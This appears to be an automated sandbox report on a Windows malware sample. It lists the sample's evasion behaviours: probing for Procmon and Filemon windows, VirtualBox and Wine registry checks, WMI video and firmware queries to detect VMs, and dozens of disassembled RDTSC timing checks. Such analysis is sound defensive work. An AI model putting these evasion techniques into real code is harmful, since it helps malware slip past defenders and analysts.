Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01336110 pushad ; ret	0_3_01336131

Source: TTsfmr1RWm.exe

Static PE information: section name: entropy: 7.983589974168695

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 98998D second address: 989992 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 989164 second address: 98916A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B02505 second address: B0250A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B0250A second address: B0252D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A0CEF8BDh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B0252D second address: B02531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B026A1 second address: B026AB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B026AB second address: B026B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B026B3 second address: B026B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B026B9 second address: B026C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B0296E second address: B02972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B02972 second address: B02978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B06453 second address: B064FF instructions: 0x00000000 rdtsc 0x00000002 je 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F91A0CEF8A8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov esi, dword ptr [ebp+122D3F19h] 0x0000002e xor dword ptr [ebp+122D36B3h], esi 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D3724h], ecx 0x0000003c cld 0x0000003d push CAECC21Eh 0x00000042 ja 00007F91A0CEF8AEh 0x00000048 add dword ptr [esp], 35133E62h 0x0000004f call 00007F91A0CEF8B4h 0x00000054 mov si, bx 0x00000057 pop ecx 0x00000058 call 00007F91A0CEF8AAh 0x0000005d or dword ptr [ebp+122D39ECh], eax 0x00000063 pop ecx 0x00000064 push 00000003h 0x00000066 mov esi, 1D984A4Ch 0x0000006b movzx edi, si 0x0000006e push 00000000h 0x00000070 stc 0x00000071 push 00000003h 0x00000073 sub dword ptr [ebp+122D2E99h], edi 0x00000079 push 745975FEh 0x0000007e push eax 0x0000007f push edx 0x00000080 push edx 0x00000081 jc 00007F91A0CEF8A6h 0x00000087 pop edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B064FF second address: B06514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0CE39B0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B066A9 second address: B066AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B0673A second address: B0673E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B0673E second address: B067A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F91A0CEF8AFh 0x00000018 popad 0x00000019 pop esi 0x0000001a mov eax, dword ptr [eax] 0x0000001c jnp 00007F91A0CEF8AEh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push edx 0x00000027 push edi 0x00000028 push edi 0x00000029 pop edi 0x0000002a pop edi 0x0000002b pop edx 0x0000002c pop eax 0x0000002d xor esi, dword ptr [ebp+122D2F1Dh] 0x00000033 push 00000003h 0x00000035 push esi 0x00000036 mov cl, 58h 0x00000038 pop edi 0x00000039 push 00000000h 0x0000003b mov cl, 37h 0x0000003d push 00000003h 0x0000003f mov ecx, 0DB1FC15h 0x00000044 mov dword ptr [ebp+122D3C5Dh], ebx 0x0000004a push BBC1EC34h 0x0000004f push esi 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B067A3 second address: B067D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 7BC1EC34h 0x0000000d mov dword ptr [ebp+122D3A8Ch], ebx 0x00000013 lea ebx, dword ptr [ebp+12451370h] 0x00000019 push eax 0x0000001a mov ecx, 69ECEC9Ch 0x0000001f pop esi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 jmp 00007F91A0CE39AFh 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B25FC3 second address: B25FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B23FC8 second address: B23FD2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0CE39AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24160 second address: B2416D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0CEF8A6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B2416D second address: B24199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F91A0CE39B3h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91A0CE39AAh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24974 second address: B24989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24C1F second address: B24C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91A0CE39B2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24D8D second address: B24D93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24D93 second address: B24DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CE39B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B24F3E second address: B24F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B250AB second address: B250DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F91A0CE39B4h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007F91A0CE39AEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B250DA second address: B250FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F91A0CEF8B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F91A0CEF8ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B25791 second address: B257A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B257A4 second address: B257AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B257AA second address: B257E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91A0CE39BEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F91A0CE39B2h 0x00000012 jg 00007F91A0CE39A6h 0x00000018 jc 00007F91A0CE39A6h 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B257E3 second address: B257EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B257EA second address: B257EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B257EF second address: B257F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B25992 second address: B25996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B25996 second address: B2599C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B25AF0 second address: B25B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CE39AAh 0x00000009 jmp 00007F91A0CE39ABh 0x0000000e popad 0x0000000f jl 00007F91A0CE39A8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jl 00007F91A0CE39D5h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F91A0CE39B2h 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B2944D second address: B2945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8AAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B2945F second address: B29465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B2A66E second address: B2A67C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B31812 second address: B3182B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39AFh 0x00000007 jc 00007F91A0CE39ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AFA9F4 second address: AFA9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AFA9F8 second address: AFAA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F91A0CE39AEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: AFAA0E second address: AFAA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F91A0CEF8A6h 0x00000009 jmp 00007F91A0CEF8ABh 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F91A0CEF8A6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B30BE6 second address: B30BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B30EE7 second address: B30EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B31075 second address: B3107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3107D second address: B3108A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3108A second address: B3109E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F91A0CE39A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B313CD second address: B313D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B31671 second address: B31690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A0CE39A6h 0x0000000a popad 0x0000000b jbe 00007F91A0CE39ACh 0x00000011 jno 00007F91A0CE39A6h 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B31690 second address: B31694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B356E5 second address: B3576A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007F91A0CE39B2h 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jbe 00007F91A0CE39B2h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 jmp 00007F91A0CE39B6h 0x0000002d pop eax 0x0000002e mov edi, dword ptr [ebp+122D3FB9h] 0x00000034 call 00007F91A0CE39A9h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F91A0CE39ADh 0x00000041 jbe 00007F91A0CE39A6h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B35B47 second address: B35B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B35C18 second address: B35C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B35C24 second address: B35C2E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B36452 second address: B36458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3694D second address: B36966 instructions: 0x00000000 rdtsc 0x00000002 je 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F91A0CEF8ACh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B36F0E second address: B36F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B36F13 second address: B36F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F91A0CEF8ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B36F25 second address: B36F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B377DF second address: B3782A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F91A0CEF8A8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 pushad 0x00000023 mov ebx, edx 0x00000025 pushad 0x00000026 mov esi, edx 0x00000028 mov bx, 10DAh 0x0000002c popad 0x0000002d popad 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 movsx edi, bx 0x00000035 mov dword ptr [ebp+122D3195h], ebx 0x0000003b xchg eax, ebx 0x0000003c push ecx 0x0000003d push ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B39201 second address: B39205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B39205 second address: B39209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B39209 second address: B39217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F91A0CE39A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B39217 second address: B3921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3A733 second address: B3A737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3A737 second address: B3A741 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A0CEF8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3B257 second address: B3B2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 mov edi, dword ptr [ebp+122D3E19h] 0x0000000e call 00007F91A0CE39B9h 0x00000013 call 00007F91A0CE39AFh 0x00000018 pop esi 0x00000019 pop eax 0x0000001a popad 0x0000001b push 00000000h 0x0000001d mov esi, dword ptr [ebp+122D2F40h] 0x00000023 push 00000000h 0x00000025 call 00007F91A0CE39B7h 0x0000002a jmp 00007F91A0CE39B0h 0x0000002f pop esi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jne 00007F91A0CE39A6h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3B2CD second address: B3B2DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3D582 second address: B3D586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3D586 second address: B3D599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F91A0CEF8AAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
